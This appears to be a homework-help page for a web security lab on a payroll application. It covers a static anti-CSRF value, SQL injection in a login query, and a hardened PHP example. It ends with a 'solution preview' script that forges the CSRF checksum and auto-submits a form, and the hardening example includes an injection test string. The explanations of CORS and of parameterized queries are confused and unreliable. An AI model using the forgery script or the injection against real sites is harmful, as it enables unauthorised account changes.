Question

Target 1:

1. Vulnerability list:
a. account.php file, line 16:
if ($action == 'save' && $_POST['U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c='] == 'U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=') {

b. account.php file, line 57:
<input type="hidden" name="U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=" value="U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=">

2. Descriptions:
a. In these lines of code there are two parameters for the verification of incoming form submissions through the HTTP POST method: the first is that the “action” parameter is set to “save”, and the second is a hidden attribute in the original form with both the name and the value "U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=", which can be obtained by inspecting the form's HTML code with the Firefox inspector tool.

3. Solution:
a. The solution to this is to use a server-side method to verify the credentials of the user when a POST request is submitted. Cookie sessions can be implemented for this, but a more secure solution is to implement session variables to bind a web browser session to a specified user. Along with this, a verification of the domain can also be implemented to filter those requests that come from outside the payroll system.

Target 2:
1. Vulnerability list and description:
a. The main vulnerability is the simple HTML code and the CORS mechanism that is not enabled on this server, so any attacker can mimic the payroll web system in order to make a website with the same look and feel.
2. Solution:
a. The server side must disable any CORS asynchronous request due to the same-origin security policy, allowing only those requests that come from the same origin.

Target 3:
1. Vulnerability list:
a. auth.php file, lines 58 and 59:
$sql = "SELECT user_id, name, eid FROM users WHERE eid='$escaped_username' AND password='$hash'";
$userdata = $this->db->query($sql)->next();

2. Descriptions:
a. In these lines of code, the $escaped_username variable can be injected with malicious code using the username parameter in order to produce a $userdata variable that can hold real username values from the database.

3. Solution:
In order to solve this, the $username and $password parameters from the login function in the auth.php file must be cleaned of this malicious injected SQL code. There are two main methods to achieve this: the first method is to use prepared statements, which are SQL string templates; by parsing this template the engine can avoid any injection. The second method is to use parameterized queries, which apply a binding to the query before executing it against the SQL database; in this process any SQL injection is caught.
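As an added example that is not part of the question or of the solution preview, the following standalone PHP 8 script shows a hardened form of the two weak points described above: a per-session anti-CSRF token compared in constant time, with an optional Origin check, in place of the fixed hidden value (Target 1), and a PDO prepared statement with the password verified in PHP rather than interpolated into SQL (Target 3). The function names, the in-memory SQLite table (which needs the pdo_sqlite extension), the password_hash storage format and the sample user are assumptions made for this demonstration, not the payroll application's own code.

```php
<?php
// Added example, not the original application's code. Function names, the
// SQLite schema and the sample user are assumptions for the demonstration.
declare(strict_types=1);

// ---- Target 1: per-session anti-CSRF token instead of a fixed hidden value ----

// Issue (or reuse) a random token bound to the current session. Because it is
// stored server side and differs per session, a forged form cannot know it.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Emit the hidden field for the real form; the value is no longer a constant.
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// Verify the submitted token in constant time; any missing or wrong value fails.
function csrf_valid(array $session, array $post): bool
{
    if (empty($session['csrf_token']) || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Optional domain verification, as the question suggests: accept the request
// only when the Origin (or Referer) host is the payroll system's own host.
function origin_allowed(array $server, string $expectedHost): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($origin, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// ---- Target 3: prepared statement instead of string-built SQL ----

// Build an in-memory SQLite database with a constructed users table (assumed schema).
function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, name TEXT, eid TEXT, password TEXT)');
    $stmt = $db->prepare('INSERT INTO users (name, eid, password) VALUES (?, ?, ?)');
    $stmt->execute(['Alice Example', 'E1001', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

// Look the user up by eid through a bound parameter, then check the password
// hash in PHP. The eid value is data to the driver, never part of the SQL text.
function login(PDO $db, string $eid, string $password): ?array
{
    $stmt = $db->prepare('SELECT user_id, name, eid, password FROM users WHERE eid = :eid');
    $stmt->execute([':eid' => $eid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// ---- Demonstration with a plain array standing in for $_SESSION ----
$session = [];
$db = demo_db();

echo csrf_field($session), PHP_EOL;

// A forged POST carrying the old static value is rejected.
var_dump(csrf_valid($session, ['csrf_token' => 'U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=']));
// The genuine form, carrying this session's token, is accepted.
var_dump(csrf_valid($session, ['csrf_token' => $session['csrf_token']]));
// A request whose Origin is not the payroll host is filtered out.
var_dump(origin_allowed(['HTTP_ORIGIN' => 'https://attacker.example'], 'payroll.example'));

// Injected SQL in the eid field is compared literally and matches no row.
var_dump(login($db, "' OR '1'='1", 'anything'));
// Correct credentials still log in.
var_dump(login($db, 'E1001', 'correct horse'));
```

In a real handler the token would live in `$_SESSION` after `session_start()`, `csrf_valid()` would run before the `$action == 'save'` branch, and `origin_allowed()` would be a secondary check only, since some clients omit both headers.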

Solution Preview


<script>

function exploit(){
  // fairly trivial string hashing function; it reproduces the checksum the form
  // expects in the 'csrfr' field from the account, challenge and route values
  String.prototype.hashCode = function(){
    var hash = 1;
    for (var i = 0; i < this.length; i++) {   // 'var' keeps i local instead of an implicit global
      hash = (13337 * hash + this.charCodeAt(i)) % 100000;
    }
    return hash;
  }

  // read the account, route and server-issued challenge fields from the page
  var a = document.getElementById('account');
  var r = document.getElementById('route');
  var challenge = document.getElementById('csrfc');
  // fill in the response value computed from those three fields
  document.getElementById('csrfr').value = (a.value+challenge.value+r.value).hashCode();

  console.log(document.getElementById('csrfr').value);
  // return;   // uncomment to inspect the computed value without submitting

  document.forms[0].submit();
}

</script>...
